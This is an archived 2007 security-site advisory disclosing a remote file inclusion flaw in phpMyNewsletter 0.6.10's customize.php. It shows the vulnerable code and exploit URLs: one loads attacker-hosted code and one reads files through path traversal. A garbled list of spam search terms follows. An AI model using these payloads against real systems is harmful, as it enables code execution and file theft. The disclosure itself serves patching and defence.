about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability




2007-04-04 phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability
Rated as : High Risk

Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°°°°°°°°°
---- /include/customize.php ----
<?
$langfile = $l;

include $l;
?>
---- /include/customize.php ----

Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view

Patch :
°°°°°°°
Autor has been alerted and last version (0.7beta1) has been patched.

More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n 
securitydot.net - 2007-04-04

Advertising

Copyright 2007, SecurityDot
Fri, 20 Nov 2009 23:42:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
%253Fsourc search/exp pic sex wwwebay.co /search/ex Theresha wwwsex.com Ssada9vqqt www.sexfuc compone www.sina-v Wap.Phoert Crack Data foto+seks all cartoo Sexy schoo None news for c components news for c interratia www.taokez shakilasex administra lejiawz.co components memolisiva www.meleji php probid www.ogrish www.saxy.c fauk anim www.112tu. www.yihuat Www.Sexyim mambo Remo search/exp free sex g www.16sf.c download i webmin sca tom jerry metacart%2 Www.Sexyim 200 /compo anf components VBulletin tamilbluef 200 %2Fcom